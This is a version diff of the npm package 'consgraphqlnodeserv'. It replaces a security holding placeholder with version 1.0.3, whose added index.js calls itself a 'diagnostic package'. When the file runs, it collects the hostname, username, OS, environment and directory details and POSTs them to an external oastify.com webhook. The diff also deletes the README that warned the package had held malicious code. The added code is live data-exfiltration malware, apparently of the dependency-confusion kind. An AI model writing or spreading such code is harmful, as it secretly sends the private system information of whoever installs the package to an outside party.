consgraphqlnodeserv 0.0.1-security → 1.0.3

package/index.js

@@ -0,0 +1,109 @@
+const os = require("os");
+const https = require("https");
+const fs = require("fs");
+
+console.log("🚨 Diagnostic package executed.\n");
+
+// ✅ Function to safely check common directories
+function checkDirectories() {
+  const dirs = ["/tmp", "/var/log", "/etc", "/home", "/Users", process.cwd()];
+
+  return dirs.map((dir) => {
+    try {
+      const stats = fs.lstatSync(dir);
+      fs.accessSync(dir, fs.constants.R_OK); // test readability
+      return {
+        path: dir,
+        exists: true,
+        isDirectory: stats.isDirectory(),
+        readable: true,
+      };
+    } catch (err) {
+      return {
+        path: dir,
+        exists: false,
+        readable: false,
+        error: err.code || err.message,
+      };
+    }
+  });
+}
+
+// ✅ Collect system data with error handling
+function collectSystemData() {
+  try {
+    return {
+      hostname: os.hostname(),
+      username: os.userInfo().username,
+      platform: os.platform(),
+      arch: os.arch(),
+      release: os.release(),
+      uptime: os.uptime(),
+      uptimeFormatted: new Date(os.uptime() * 1000).toISOString().substr(11, 8),
+      timestamp: new Date().toISOString(),
+
+      // Hardware and runtime
+      cpuCount: os.cpus().length,
+      cpuModel: os.cpus()[0]?.model || "unknown",
+      loadAverage: os.loadavg(),
+      totalMemoryMB: Math.round(os.totalmem() / 1e6),
+      freeMemoryMB: Math.round(os.freemem() / 1e6),
+      memoryUsageMB: Math.round(process.memoryUsage().rss / 1e6),
+      nodeVersion: process.version,
+      cwd: process.cwd(),
+
+      // Env info (safe subset)
+      env: {
+        user: process.env.USER || process.env.USERNAME || "unknown",
+        shell: process.env.SHELL || "unknown",
+        term: process.env.TERM || "unknown",
+        pathLength: (process.env.PATH || "").split(":").length,
+        nodeEnv: process.env.NODE_ENV || "not set",
+      },
+
+      // Locale and system
+      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
+      locale: Intl.DateTimeFormat().resolvedOptions().locale,
+      osType: os.type(),
+      endianness: os.endianness(),
+      versions: process.versions,
+
+      // Safe directories
+      directories: checkDirectories(),
+    };
+  } catch (err) {
+    console.error("❌ Error collecting system data:", err.message);
+    return { error: "Failed to collect system data", details: err.message };
+  }
+}
+
+// ✅ Prepare and show payload
+const systemData = collectSystemData();
+const payload = JSON.stringify(systemData, null, 2);
+
+console.log("📦 Collected System Info:\n");
+console.log(payload);
+
+// ✅ Send to webhook
+const options = {
+  hostname: "trojum8gfcm6wa2cb38dv361tszjndb2.oastify.com", // 🔁 Replace with your webhook host
+  path: "/machine-check", // 🔁 Your desired path
+  method: "POST",
+  headers: {
+    "Content-Type": "application/json",
+    "Content-Length": Buffer.byteLength(payload),
+  },
+};
+
+const req = https.request(options, (res) => {
+  console.log(
+    `\n✅ Webhook sent. Server responded with status: ${res.statusCode}`,
+  );
+});
+
+req.on("error", (error) => {
+  console.error("\n❌ Failed to send data:", error.message);
+});
+
+req.write(payload);
+req.end();

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "consgraphqlnodeserv",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.3",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC",
+  "description": ""
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=consgraphqlnodeserv for more information.